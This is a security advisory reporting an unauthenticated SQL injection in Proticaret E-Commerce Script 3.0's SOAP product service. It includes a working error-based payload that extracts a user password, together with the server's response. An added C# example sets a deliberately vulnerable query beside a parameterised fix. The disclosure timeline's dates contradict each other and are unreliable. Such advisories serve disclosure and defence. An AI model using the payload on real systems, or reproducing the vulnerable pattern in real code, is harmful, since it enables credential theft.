Proticaret E-Commerce Script 3.0 - SQL Injection (1)

13 Nov 2014. Reported by Onur Alanbel (BGA). Type: exploitdb. Source: www.exploit-db.com

Proticaret E-Commerce Script v3.0 SQL Injection Vul

Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
===========
13 Nov 2014

Product & Service Introduction:
========================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0

Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
26 Jun 2014 : Patch Released
13 Nov 2014 : Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Vendor: Promist Bilgi İletişim Teknolojileri A.Ş.
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
==================
Remote, Unauthenticated


Severity Level:
===========
Critical

Technical Details & Description:
========================
The Code parameter of the GetProductCodes method of the ProductService SOAP web service (ASPNetPortal.ProductService, namespace http://tempuri.org/) is placed into a SQL query without validation or parameterisation. Because the resulting System.Data.SqlClient.SqlException is returned verbatim in the SOAP fault, a remote unauthenticated attacker can use error-based injection to read data from the database; the PoC below demonstrates this by retrieving a password from the Users table through a type-conversion error.

Proof of Concept (PoC):
==================
Proof of Concept

Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1--</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>


Solution Fix & Patch:
================
Apply the patch for v3.0
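As a worked illustration of the flaw class and of the kind of fix the patch must contain, the following is an added example written for this page; it is neither Proticaret's source nor the vendor patch. The query shape is inferred from the stack trace in the PoC response (ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) reading rows from a SqlDataReader); the Products table, the ProductCode column, the connection-string name and the parameter lengths are assumptions. The vulnerable method shows how a quote in Code turns the value into SQL and how the SqlException text reaches the caller; the hardened method binds the values as parameters and keeps database errors out of the SOAP fault.

```csharp
// Added example (not Proticaret's code). Table, column, connection-string name
// and parameter sizes are assumptions; the method signature comes from the
// advisory's stack trace.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.Services;
using System.Web.Services.Protocols;

[WebService(Namespace = "http://tempuri.org/")]
public class ProductService : WebService
{
    private static string ConnectionString
    {
        // "Shop" is an assumed connection-string name.
        get { return ConfigurationManager.ConnectionStrings["Shop"].ConnectionString; }
    }

    // BEFORE (vulnerable pattern): the SOAP parameters are concatenated into the
    // statement. A single quote in Code closes the literal, so the remainder of
    // the value runs as SQL, and the unhandled SqlException is serialised into the
    // SOAP fault, which is exactly what the PoC response shows.
    [WebMethod]
    public List<string> GetProductCodes_Vulnerable(string Code, string StartWith)
    {
        string sql = "SELECT ProductCode FROM Products WHERE ProductCode = '" + Code +
                     "' OR ProductCode LIKE '" + StartWith + "%'";
        var results = new List<string>();
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    results.Add(reader.GetString(0));
            }
        }
        return results;
    }

    // AFTER (hardened): values are bound as typed parameters, so they can never
    // become SQL syntax; LIKE wildcards in the prefix are escaped; and database
    // errors are logged server-side while the caller receives only a generic fault.
    [WebMethod]
    public List<string> GetProductCodes(string Code, string StartWith)
    {
        const string sql =
            "SELECT ProductCode FROM Products " +
            "WHERE ProductCode = @code OR ProductCode LIKE @prefix + '%' ESCAPE '\\'";

        var results = new List<string>();
        try
        {
            using (var conn = new SqlConnection(ConnectionString))
            using (var cmd = new SqlCommand(sql, conn))
            {
                cmd.Parameters.Add("@code", SqlDbType.NVarChar, 50).Value =
                    (object)Code ?? DBNull.Value;
                cmd.Parameters.Add("@prefix", SqlDbType.NVarChar, 50).Value =
                    EscapeLikePattern(StartWith ?? string.Empty);
                conn.Open();
                using (SqlDataReader reader = cmd.ExecuteReader())
                {
                    while (reader.Read())
                        results.Add(reader.GetString(0));
                }
            }
        }
        catch (SqlException ex)
        {
            // The SqlException message can echo query results (see the PoC), so it
            // stays in the server log and never reaches the SOAP response.
            System.Diagnostics.Trace.TraceError("GetProductCodes failed: {0}", ex);
            throw new SoapException("Server was unable to process request.",
                                    SoapException.ServerFaultCode);
        }
        return results;
    }

    // Escapes the T-SQL LIKE metacharacters so a caller cannot widen the prefix match.
    internal static string EscapeLikePattern(string value)
    {
        return value.Replace("\\", "\\\\").Replace("%", "\\%")
                    .Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

Two points follow from the PoC itself. First, the injected query read the Users table, so the database login used by the web service should be restricted to the tables and columns the product catalogue needs; with least privilege on the login, an injection in a product lookup cannot reach credential data. Second, the fault in the PoC carried a full stack trace, so beyond the catch shown above it is worth confirming that the deployed service does not return exception details to anonymous callers.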

Security Risk:
==========
The risk of the vulnerability above is estimated as critical.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: [email protected]

Copyright © 2014 | BGA

Vulners AI Score: 7.4 (High risk), as of 13 Nov 2014